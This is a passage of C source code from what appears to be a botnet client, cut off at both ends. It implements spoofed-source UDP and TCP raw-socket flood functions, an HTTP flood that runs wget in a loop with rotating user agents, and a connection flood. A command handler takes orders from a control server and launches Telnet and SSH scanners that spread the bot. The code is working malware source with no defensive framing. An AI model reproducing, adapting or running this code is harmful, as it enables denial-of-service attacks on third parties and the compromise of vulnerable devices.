+ timeEnd; register unsigned int i = 0; while(1) { sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr)); udph->source = rand_cmwc(); udph->dest = (port == 0 ? rand_cmwc() : htons(port)); iph->id = rand_cmwc(); iph->saddr = htonl( getRandomIP(netmask) ); iph->check = csum ((unsigned short *) packet, iph->tot_len); if(i == pollRegister) { if(time(NULL) > end) break; i = 0; continue; } i++; } } } void sendTCP(unsigned char *target, int port, int timeEnd, int spoofit, unsigned char *flags, int packetsize, int pollinterval) { register unsigned int pollRegister; pollRegister = pollinterval; struct sockaddr_in dest_addr; dest_addr.sin_family = AF_INET; if(port == 0) dest_addr.sin_port = rand_cmwc(); else dest_addr.sin_port = htons(port); if(getHost(target, &dest_addr.sin_addr)) return; memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero); int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); if(!sockfd) { sockprintf(mainCommSock, "Failed opening raw socket."); return; } int tmp = 1; if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) { sockprintf(mainCommSock, "Failed setting raw headers mode."); return; } in_addr_t netmask; if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) ); else netmask = ( ~((1 << (32 - spoofit)) - 1) ); unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize]; struct iphdr *iph = (struct iphdr *)packet; struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr); makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize); tcph->source = rand_cmwc(); tcph->seq = rand_cmwc(); tcph->ack_seq = 0; tcph->doff = 5; if(!strcmp(flags, "all")) { tcph->syn = 1; tcph->rst = 1; tcph->fin = 1; tcph->ack = 1; tcph->psh = 1; } else { unsigned char *pch = strtok(flags, ","); while(pch) { if(!strcmp(pch, "syn")) { tcph->syn = 1; } else if(!strcmp(pch, "rst")) { tcph->rst = 1; } else if(!strcmp(pch, "fin")) { tcph->fin = 1; } else if(!strcmp(pch, "ack")) { tcph->ack = 1; } else if(!strcmp(pch, "psh")) { tcph->psh = 1; } else { sockprintf(mainCommSock, "Invalid flag \"%s\"", pch); } pch = strtok(NULL, ","); } } tcph->window = rand_cmwc(); tcph->check = 0; tcph->urg_ptr = 0; tcph->dest = (port == 0 ? rand_cmwc() : htons(port)); tcph->check = tcpcsum(iph, tcph); iph->check = csum ((unsigned short *) packet, iph->tot_len); int end = time(NULL) + timeEnd; register unsigned int i = 0; while(1) { sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr)); iph->saddr = htonl( getRandomIP(netmask) ); iph->id = rand_cmwc(); tcph->seq = rand_cmwc(); tcph->source = rand_cmwc(); tcph->check = 0; tcph->check = tcpcsum(iph, tcph); iph->check = csum ((unsigned short *) packet, iph->tot_len); if(i == pollRegister) { if(time(NULL) > end) break; i = 0; continue; } i++; } } void sendHTTP(unsigned char *url, int end_time) { int end = time(NULL) + end_time; FILE *pf; char *UA = useragents[rand() % (sizeof(useragents)/sizeof(char *))]; char *command[80]; sprintf(command,"wget -s -U \""); strcat(command, UA); strcat(command,"\" -q "); strcat(command, url); while(end > time(NULL)) { UA = useragents[rand() % (sizeof(useragents)/sizeof(char *))]; sprintf(command,"wget -s -U \""); strcat(command, UA); strcat(command,"\" -q "); strcat(command, url); system(command); } } void sendCNC(unsigned char *ip,int port, int end_time) { int end = time(NULL) + end_time; int sockfd; struct sockaddr_in server; //sockfd = socket(AF_INET, SOCK_STREAM, 0); server.sin_addr.s_addr = inet_addr(ip); server.sin_family = AF_INET; server.sin_port = htons(port); while(end > time(NULL)) { sockfd = socket(AF_INET, SOCK_STREAM, 0); connect(sockfd , (struct sockaddr *)&server , sizeof(server)); sleep(1); close(sockfd); } } void processCmd(int argc, unsigned char *argv[]) { int x; if(!strcmp(argv[0], "PING")) { sockprintf(mainCommSock, "PONG!"); return; } if(!strcmp(argv[0], "GETLOCALIP")) { sockprintf(mainCommSock, "My IP: %s", inet_ntoa(ourIP)); return; } if(!strcmp(argv[0], "SCANNER")) { if(argc != 2) { sockprintf(mainCommSock, "SCANNER SSH/TELNET ON | SSH/TELNET OFF"); return; } if(!strcmp(argv[1], "OFF")) { if(scanPid == 0) return; sockprintf(mainCommSock, "TELNET SCANNER STOPPED\n"); kill(scanPid, 9); scanPid = 0; if(!strcmp(argv[1], "TELNET ON")) { if(scanPid != 0) return; uint32_t parent; parent = fork(); sockprintf(mainCommSock, "TELNET SCANNER EXECUTED\n"); if (parent > 0) { scanPid = parent; return;} else if(parent == -1) return; TelnetScanner(1); _exit(0); } if(!strcmp(argv[1], "SSH ON")) { if(scanPid != 0) return; uint32_t parent; parent = fork(); sockprintf(mainCommSock, "SSH SCANNER EXECUTED\n"); if (parent > 0) { scanPid = parent; return;} else if(parent == -1) return; SSHScanner(1); _exit(0); }}} if(!strcmp(argv[0], "UDP")) { if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[5]) == -1 || atoi(argv[5]) > 65500 || atoi(argv[4]) > 32 || (argc == 7 && atoi(argv[6]) < 1)) { //sockprintf(mainCommSock, "UDP